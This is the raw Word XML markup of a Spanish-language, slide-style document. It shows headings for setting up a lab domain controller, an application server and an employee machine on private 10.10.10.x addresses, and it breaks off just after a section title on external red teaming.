        <w:spacing w:before="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15800832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E259BBE" wp14:editId="23D494FA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>8506714</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899905</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3067050" cy="429323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4293235"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3067050" cy="4293235"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="358" name="Image 358"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId174" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="31496" y="111134"/>
                            <a:ext cx="2962275" cy="4181839"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="359" name="Graphic 359"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6350" y="6350"/>
                            <a:ext cx="3054350" cy="887094"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="3054350" h="887094">
                                <a:moveTo>
                                  <a:pt x="0" y="886967"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3054096" y="886967"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3054096" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="886967"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="1270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7D921B32" id="Group 357" o:spid="_x0000_s1026" style="position:absolute;margin-left:669.8pt;margin-top:-70.85pt;width:241.5pt;height:338.05pt;z-index:15800832;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="30670,4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">
                <v:shape id="Image 358" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:314;top:1111;width:29623;height:4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">
                  <v:imagedata r:id="rId175" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 359" o:spid="_x0000_s1028" style="position:absolute;left:63;top:63;width:30544;height:8871;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3054350,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" path="m,886967r3054096,l3054096,,,,,886967xe" filled="f" strokecolor="#ec7c30" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Configuración e instalación del controlador de dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5425C9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="741"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3A8C1A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1180"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instalación y configuración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731D937D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1899"/>
        </w:tabs>
        <w:spacing w:before="564"/>
        <w:ind w:left="1899" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Controlador de dominio [ 10.10.10.2 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B01EA4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="840" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9459B7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="586"/>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801344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D640334" wp14:editId="70DBA732">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7813500</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>768026</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3477895" cy="5308600"/>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7895" cy="5308600"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3477895" cy="5308600"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="361" name="Image 361"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId161" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3477862" cy="5308231"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="362" name="Image 362"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId162" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164639" y="164661"/>
                            <a:ext cx="3162300" cy="4992624"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="287765CA" id="Group 360" o:spid="_x0000_s1026" style="position:absolute;margin-left:615.25pt;margin-top:60.45pt;width:273.85pt;height:418pt;z-index:15801344;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="34778,530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">
                <v:shape id="Image 361" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:34778;height:5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">
                  <v:imagedata r:id="rId163" o:title=""/>
                </v:shape>
                <v:shape id="Image 362" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1646;top:1646;width:31623;height:4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">
                  <v:imagedata r:id="rId164" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="494276AE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1544"/>
          <w:tab w:val="left" w:pos="1603"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1603" w:right="8237" w:hanging="869"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instalación empleado-máquina (unido a un dominio)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CFC9B4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="748"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F79C5B9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1185"/>
        </w:tabs>
        <w:ind w:left="1185" w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instalación y configuración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA3210C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1904"/>
        </w:tabs>
        <w:spacing w:before="564"/>
        <w:ind w:left="1904" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Empleado-Máquina </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[ 10.10.10.4 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5637B734" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1200" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327C2AAC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="178"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607DC7B9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1295"/>
          <w:tab w:val="left" w:pos="1372"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1372" w:right="7106" w:hanging="869"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15801856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35AA2A0B" wp14:editId="5C1BABA8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>8208009</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-96297</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3223895" cy="4163060"/>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3895" cy="4163060"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3223895" cy="4163060"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="364" name="Image 364"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId176" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="87122" y="49021"/>
                            <a:ext cx="3048000" cy="4113664"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="365" name="Graphic 365"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6350" y="6350"/>
                            <a:ext cx="3211195" cy="984885"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="3211195" h="984885">
                                <a:moveTo>
                                  <a:pt x="0" y="984503"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3211068" y="984503"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3211068" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="984503"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="1270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55EDEDDE" id="Group 363" o:spid="_x0000_s1026" style="position:absolute;margin-left:646.3pt;margin-top:-7.6pt;width:253.85pt;height:327.8pt;z-index:15801856;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="32238,41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">
                <v:shape id="Image 364" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:871;top:490;width:30480;height:4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">
                  <v:imagedata r:id="rId177" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 365" o:spid="_x0000_s1028" style="position:absolute;left:63;top:63;width:32112;height:9849;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3211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" path="m,984503r3211068,l3211068,,,,,984503xe" filled="f" strokecolor="#ec7c30" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instalación de la configuración del servidor de aplicaciones (unido a un dominio)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5463E9BC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="748"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="180AAFDC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="955"/>
        </w:tabs>
        <w:ind w:left="955" w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instalación y configuración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D09473D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1674"/>
        </w:tabs>
        <w:spacing w:before="564"/>
        <w:ind w:left="1674" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Servidor de aplicaciones </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[ 10.10.10.3 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FED178"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399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B6A80F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5A1B84" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADE8F82" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47347878" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42FE7261" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3676C476" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="2733"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C9526B2" wp14:editId="70FA4C42">
                <wp:extent cx="8961120" cy="3214370"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>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1120" cy="3214370"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="B34512"/>
                        </a:solidFill>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0797B4E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="1011" w:line="211" w:lineRule="auto"/>
                              <w:ind w:left="1904" w:right="1996" w:firstLine="938"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                              <w:t>3. Red Teaming en el entorno externo</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2C9526B2" id="Textbox 366" o:spid="_x0000_s1178" type="#_x0000_t202" style="width:705.6pt;height:2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" fillcolor="#b34512" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0797B4E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="1011" w:line="211" w:lineRule="auto"/>
                        <w:ind w:left="1904" w:right="1996" w:firstLine="938"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                        <w:t>3. Red Teaming en el entorno externo</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="055BB8D0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ACDC427"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802880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D4C78C3" wp14:editId="09C1A331">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1325880"/>
                <wp:effectExtent l="0" t="0" r="0"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25880"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1325880"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="369" name="Graphic 369"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1325880">
                                <a:moveTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
